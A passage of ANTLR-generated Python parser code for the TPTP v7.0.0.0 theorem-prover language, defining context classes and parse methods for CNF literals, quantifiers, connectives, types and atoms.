return tptp_v7_0_0_0Parser.RULE_cnf_disjunction
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCnf_disjunction" ):
listener.enterCnf_disjunction(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCnf_disjunction" ):
listener.exitCnf_disjunction(self)
def cnf_disjunction(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Cnf_disjunctionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 244
self.enterRecursionRule(localctx, 244, self.RULE_cnf_disjunction, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1272
self.cnf_literal()
self._ctx.stop = self._input.LT(-1)
self.state = 1279
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,89,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Cnf_disjunctionContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_cnf_disjunction)
self.state = 1274
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 1275
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 1276
self.cnf_literal()
self.state = 1281
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,89,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Cnf_literalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_atomic_formulaContext,0)
def Not(self):
return self.getToken(tptp_v7_0_0_0Parser.Not, 0)
def fof_infix_unary(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_infix_unaryContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_cnf_literal
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCnf_literal" ):
listener.enterCnf_literal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCnf_literal" ):
listener.exitCnf_literal(self)
def cnf_literal(self):
localctx = tptp_v7_0_0_0Parser.Cnf_literalContext(self, self._ctx, self.state)
self.enterRule(localctx, 246, self.RULE_cnf_literal)
try:
self.state = 1286
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,90,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1282
self.fof_atomic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1283
self.match(tptp_v7_0_0_0Parser.Not)
self.state = 1284
self.fof_atomic_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1285
self.fof_infix_unary()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_quantifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_quantifierContext,0)
def th0_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Th0_quantifierContext,0)
def th1_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Th1_quantifierContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_quantifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_quantifier" ):
listener.enterThf_quantifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_quantifier" ):
listener.exitThf_quantifier(self)
def thf_quantifier(self):
localctx = tptp_v7_0_0_0Parser.Thf_quantifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 248, self.RULE_thf_quantifier)
try:
self.state = 1291
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Forall, tptp_v7_0_0_0Parser.Exists]:
self.enterOuterAlt(localctx, 1)
self.state = 1288
self.fof_quantifier()
pass
elif token in [tptp_v7_0_0_0Parser.Lambda, tptp_v7_0_0_0Parser.Choice, tptp_v7_0_0_0Parser.Description]:
self.enterOuterAlt(localctx, 2)
self.state = 1289
self.th0_quantifier()
pass
elif token in [tptp_v7_0_0_0Parser.TyForall, tptp_v7_0_0_0Parser.TyExists]:
self.enterOuterAlt(localctx, 3)
self.state = 1290
self.th1_quantifier()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Th0_quantifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lambda(self):
return self.getToken(tptp_v7_0_0_0Parser.Lambda, 0)
def Choice(self):
return self.getToken(tptp_v7_0_0_0Parser.Choice, 0)
def Description(self):
return self.getToken(tptp_v7_0_0_0Parser.Description, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_th0_quantifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTh0_quantifier" ):
listener.enterTh0_quantifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTh0_quantifier" ):
listener.exitTh0_quantifier(self)
def th0_quantifier(self):
localctx = tptp_v7_0_0_0Parser.Th0_quantifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 250, self.RULE_th0_quantifier)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1293
_la = self._input.LA(1)
if not(((((_la - 61)) & ~0x3f) == 0 and ((1 << (_la - 61)) & ((1 << (tptp_v7_0_0_0Parser.Lambda - 61)) | (1 << (tptp_v7_0_0_0Parser.Choice - 61)) | (1 << (tptp_v7_0_0_0Parser.Description - 61)))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Th1_quantifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def TyForall(self):
return self.getToken(tptp_v7_0_0_0Parser.TyForall, 0)
def TyExists(self):
return self.getToken(tptp_v7_0_0_0Parser.TyExists, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_th1_quantifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTh1_quantifier" ):
listener.enterTh1_quantifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTh1_quantifier" ):
listener.exitTh1_quantifier(self)
def th1_quantifier(self):
localctx = tptp_v7_0_0_0Parser.Th1_quantifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 252, self.RULE_th1_quantifier)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1295
_la = self._input.LA(1)
if not(_la==tptp_v7_0_0_0Parser.TyForall or _la==tptp_v7_0_0_0Parser.TyExists):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_pair_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Infix_equality(self):
return self.getToken(tptp_v7_0_0_0Parser.Infix_equality, 0)
def Infix_inequality(self):
return self.getToken(tptp_v7_0_0_0Parser.Infix_inequality, 0)
def binary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Binary_connectiveContext,0)
def Assignment(self):
return self.getToken(tptp_v7_0_0_0Parser.Assignment, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_pair_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_pair_connective" ):
listener.enterThf_pair_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_pair_connective" ):
listener.exitThf_pair_connective(self)
def thf_pair_connective(self):
localctx = tptp_v7_0_0_0Parser.Thf_pair_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 254, self.RULE_thf_pair_connective)
try:
self.state = 1301
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Infix_equality]:
self.enterOuterAlt(localctx, 1)
self.state = 1297
self.match(tptp_v7_0_0_0Parser.Infix_equality)
pass
elif token in [tptp_v7_0_0_0Parser.Infix_inequality]:
self.enterOuterAlt(localctx, 2)
self.state = 1298
self.match(tptp_v7_0_0_0Parser.Infix_inequality)
pass
elif token in [tptp_v7_0_0_0Parser.Iff, tptp_v7_0_0_0Parser.Impl, tptp_v7_0_0_0Parser.If, tptp_v7_0_0_0Parser.Niff, tptp_v7_0_0_0Parser.Nor, tptp_v7_0_0_0Parser.Nand]:
self.enterOuterAlt(localctx, 3)
self.state = 1299
self.binary_connective()
pass
elif token in [tptp_v7_0_0_0Parser.Assignment]:
self.enterOuterAlt(localctx, 4)
self.state = 1300
self.match(tptp_v7_0_0_0Parser.Assignment)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_unary_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Unary_connectiveContext,0)
def th1_unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Th1_unary_connectiveContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_unary_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_unary_connective" ):
listener.enterThf_unary_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_unary_connective" ):
listener.exitThf_unary_connective(self)
def thf_unary_connective(self):
localctx = tptp_v7_0_0_0Parser.Thf_unary_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 256, self.RULE_thf_unary_connective)
try:
self.state = 1305
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Not]:
self.enterOuterAlt(localctx, 1)
self.state = 1303
self.unary_connective()
pass
elif token in [tptp_v7_0_0_0Parser.ForallComb, tptp_v7_0_0_0Parser.ExistsComb, tptp_v7_0_0_0Parser.ChoiceComb, tptp_v7_0_0_0Parser.DescriptionComb, tptp_v7_0_0_0Parser.EqComb]:
self.enterOuterAlt(localctx, 2)
self.state = 1304
self.th1_unary_connective()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Th1_unary_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ForallComb(self):
return self.getToken(tptp_v7_0_0_0Parser.ForallComb, 0)
def ExistsComb(self):
return self.getToken(tptp_v7_0_0_0Parser.ExistsComb, 0)
def ChoiceComb(self):
return self.getToken(tptp_v7_0_0_0Parser.ChoiceComb, 0)
def DescriptionComb(self):
return self.getToken(tptp_v7_0_0_0Parser.DescriptionComb, 0)
def EqComb(self):
return self.getToken(tptp_v7_0_0_0Parser.EqComb, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_th1_unary_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTh1_unary_connective" ):
listener.enterTh1_unary_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTh1_unary_connective" ):
listener.exitTh1_unary_connective(self)
def th1_unary_connective(self):
localctx = tptp_v7_0_0_0Parser.Th1_unary_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 258, self.RULE_th1_unary_connective)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1307
_la = self._input.LA(1)
if not(((((_la - 53)) & ~0x3f) == 0 and ((1 << (_la - 53)) & ((1 << (tptp_v7_0_0_0Parser.ForallComb - 53)) | (1 << (tptp_v7_0_0_0Parser.ExistsComb - 53)) | (1 << (tptp_v7_0_0_0Parser.ChoiceComb - 53)) | (1 << (tptp_v7_0_0_0Parser.DescriptionComb - 53)) | (1 << (tptp_v7_0_0_0Parser.EqComb - 53)))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_pair_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def binary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Binary_connectiveContext,0)
def Assignment(self):
return self.getToken(tptp_v7_0_0_0Parser.Assignment, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_pair_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_pair_connective" ):
listener.enterTff_pair_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_pair_connective" ):
listener.exitTff_pair_connective(self)
def tff_pair_connective(self):
localctx = tptp_v7_0_0_0Parser.Tff_pair_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 260, self.RULE_tff_pair_connective)
try:
self.state = 1311
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Iff, tptp_v7_0_0_0Parser.Impl, tptp_v7_0_0_0Parser.If, tptp_v7_0_0_0Parser.Niff, tptp_v7_0_0_0Parser.Nor, tptp_v7_0_0_0Parser.Nand]:
self.enterOuterAlt(localctx, 1)
self.state = 1309
self.binary_connective()
pass
elif token in [tptp_v7_0_0_0Parser.Assignment]:
self.enterOuterAlt(localctx, 2)
self.state = 1310
self.match(tptp_v7_0_0_0Parser.Assignment)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_quantifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Forall(self):
return self.getToken(tptp_v7_0_0_0Parser.Forall, 0)
def Exists(self):
return self.getToken(tptp_v7_0_0_0Parser.Exists, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_quantifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_quantifier" ):
listener.enterFof_quantifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_quantifier" ):
listener.exitFof_quantifier(self)
def fof_quantifier(self):
localctx = tptp_v7_0_0_0Parser.Fof_quantifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 262, self.RULE_fof_quantifier)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1313
_la = self._input.LA(1)
if not(_la==tptp_v7_0_0_0Parser.Forall or _la==tptp_v7_0_0_0Parser.Exists):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Binary_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Iff(self):
return self.getToken(tptp_v7_0_0_0Parser.Iff, 0)
def Impl(self):
return self.getToken(tptp_v7_0_0_0Parser.Impl, 0)
def If(self):
return self.getToken(tptp_v7_0_0_0Parser.If, 0)
def Niff(self):
return self.getToken(tptp_v7_0_0_0Parser.Niff, 0)
def Nor(self):
return self.getToken(tptp_v7_0_0_0Parser.Nor, 0)
def Nand(self):
return self.getToken(tptp_v7_0_0_0Parser.Nand, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_binary_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterBinary_connective" ):
listener.enterBinary_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitBinary_connective" ):
listener.exitBinary_connective(self)
def binary_connective(self):
localctx = tptp_v7_0_0_0Parser.Binary_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 264, self.RULE_binary_connective)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1315
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << tptp_v7_0_0_0Parser.Iff) | (1 << tptp_v7_0_0_0Parser.Impl) | (1 << tptp_v7_0_0_0Parser.If) | (1 << tptp_v7_0_0_0Parser.Niff) | (1 << tptp_v7_0_0_0Parser.Nor) | (1 << tptp_v7_0_0_0Parser.Nand))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Assoc_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Or(self):
return self.getToken(tptp_v7_0_0_0Parser.Or, 0)
def And(self):
return self.getToken(tptp_v7_0_0_0Parser.And, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_assoc_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAssoc_connective" ):
listener.enterAssoc_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAssoc_connective" ):
listener.exitAssoc_connective(self)
def assoc_connective(self):
localctx = tptp_v7_0_0_0Parser.Assoc_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 266, self.RULE_assoc_connective)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1317
_la = self._input.LA(1)
if not(_la==tptp_v7_0_0_0Parser.Or or _la==tptp_v7_0_0_0Parser.And):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Unary_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Not(self):
return self.getToken(tptp_v7_0_0_0Parser.Not, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_unary_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterUnary_connective" ):
listener.enterUnary_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitUnary_connective" ):
listener.exitUnary_connective(self)
def unary_connective(self):
localctx = tptp_v7_0_0_0Parser.Unary_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 268, self.RULE_unary_connective)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1319
self.match(tptp_v7_0_0_0Parser.Not)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Type_constantContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def type_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Type_functorContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_type_constant
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterType_constant" ):
listener.enterType_constant(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitType_constant" ):
listener.exitType_constant(self)
def type_constant(self):
localctx = tptp_v7_0_0_0Parser.Type_constantContext(self, self._ctx, self.state)
self.enterRule(localctx, 270, self.RULE_type_constant)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1321
self.type_functor()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Type_functorContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_type_functor
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterType_functor" ):
listener.enterType_functor(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitType_functor" ):
listener.exitType_functor(self)
def type_functor(self):
localctx = tptp_v7_0_0_0Parser.Type_functorContext(self, self._ctx, self.state)
self.enterRule(localctx, 272, self.RULE_type_functor)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1323
self.atomic_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Dollar_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Dollar_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_type" ):
listener.enterDefined_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_type" ):
listener.exitDefined_type(self)
def defined_type(self):
localctx = tptp_v7_0_0_0Parser.Defined_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 274, self.RULE_defined_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1325
self.match(tptp_v7_0_0_0Parser.Dollar_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class System_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_system_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_system_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_system_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSystem_type" ):
listener.enterSystem_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSystem_type" ):
listener.exitSystem_type(self)
def system_type(self):
localctx = tptp_v7_0_0_0Parser.System_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 276, self.RULE_system_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1327
self.atomic_system_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AtomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def untyped_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Untyped_atomContext,0)
def defined_constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_constantContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_atom
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtom" ):
listener.enterAtom(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtom" ):
listener.exitAtom(self)
def atom(self):
localctx = tptp_v7_0_0_0Parser.AtomContext(self, self._ctx, self.state)
self.enterRule(localctx, 278, self.RULE_atom)
try:
self.state = 1331
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1329
self.untyped_atom()
pass
elif token in [tptp_v7_0_0_0Parser.Dollar_word]:
self.enterOuterAlt(localctx, 2)
self.state = 1330
self.defined_constant()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Untyped_atomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.ConstantContext,0)
def system_constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.System_constantContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_untyped_atom
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterUntyped_atom" ):
listener.enterUntyped_atom(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitUntyped_atom" ):
listener.exitUntyped_atom(self)
def untyped_atom(self):
localctx = tptp_v7_0_0_0Parser.Untyped_atomContext(self, self._ctx, self.state)
self.enterRule(localctx, 280, self.RULE_untyped_atom)
try:
self.state = 1335
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1333
self.constant()
pass
elif token in [tptp_v7_0_0_0Parser.Dollar_dollar_word]:
self.enterOuterAlt(localctx, 2)
self.state = 1334
self.system_constant()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_propositionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Dollar_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Dollar_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_proposition
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_proposition" ):
listener.enterDefined_proposition(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_proposition" ):
listener.exitDefined_proposition(self)
def defined_proposition(self):
localctx = tptp_v7_0_0_0Parser.Defined_propositionContext(self, self._ctx, self.state)
self.enterRule(localctx, 282, self.RULE_defined_proposition)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1337
self.match(tptp_v7_0_0_0Parser.Dollar_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_predicateContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Dollar_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Dollar_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_predicate
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_predicate" ):
listener.enterDefined_predicate(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_predicate" ):
listener.exitDefined_predicate(self)
def defined_predicate(self):
localctx = tptp_v7_0_0_0Parser.Defined_predicateContext(self, self._ctx, self.state)
self.enterRule(localctx, 284, self.RULE_defined_predicate)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1339
self.match(tptp_v7_0_0_0Parser.Dollar_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_infix_predContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Infix_equality(self):
return self.getToken(tptp_v7_0_0_0Parser.Infix_equality, 0)
def Assignment(self):
return self.getToken(tptp_v7_0_0_0Parser.Assignment, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_infix_pred
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_infix_pred" ):
listener.enterDefined_infix_pred(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_infix_pred" ):
listener.exitDefined_infix_pred(self)
def defined_infix_pred(self):
localctx = tptp_v7_0_0_0Parser.Defined_infix_predContext(self, self._ctx, self.state)
self.enterRule(localctx, 286, self.RULE_defined_infix_pred)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1341
_la = self._input.LA(1)
if not(_la==tptp_v7_0_0_0Parser.Infix_equality or _la==tptp_v7_0_0_0Parser.Assignment):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ConstantContext(ParserRuleContext):
